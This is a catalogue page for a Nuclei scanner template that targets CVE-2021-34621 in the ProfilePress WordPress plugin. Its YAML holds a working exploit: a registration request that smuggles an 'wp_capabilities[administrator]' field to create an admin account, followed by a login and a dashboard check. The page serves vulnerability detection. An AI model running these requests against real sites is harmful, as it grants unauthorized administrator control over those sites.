Skip to content
Nuclei Templates

WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness

ID: CVE-2021-34621

Severity: critical

Author: 0xsapra

Tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction

Description

Section titled “Description”

ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.

YAML Source

Section titled “YAML Source”
id: CVE-2021-34621


info:
  name: WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness
  author: 0xsapra
  severity: critical
  description: ProfilePress WordPress plugin  is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.
  impact: |
    An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site.
  remediation: |
    Update to the latest version of ProfilePress to fix the admin user creation weakness.
  reference:
    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34621
    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/
    - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-34621
    cwe-id: CWE-306,CWE-269
    epss-score: 0.7888
    epss-percentile: 0.97984
    cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: properfraction
    product: profilepress
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction


http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}


        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_username"


        {{randstr}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_email"


        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password"


        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password_present"


        true
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_first_name"


        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_last_name"


        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="_wp_http_referer"


        /wp/?page_id=18
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="pp_current_url"


        {{BaseURL}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="wp_capabilities[administrator]"


        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_form_id"


        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_referrer_page"




        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="action"


        pp_ajax_signup
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="melange_id"




        -----------------------------138742543134772812001999326589--
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}


        log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In
      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Welcome to your WordPress Dashboard


      - type: status
        status:
          - 200
# digest: 4a0a00473045022029ab825bc0f618dcefdd44a6da9802bdf75cf3210768055cc7988ed055342672022100d4e32b40093e5bf06d3ddf614fec163ceeaaa78dbd231b25fb723c8eb839a34d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-34621.yaml"

View on Github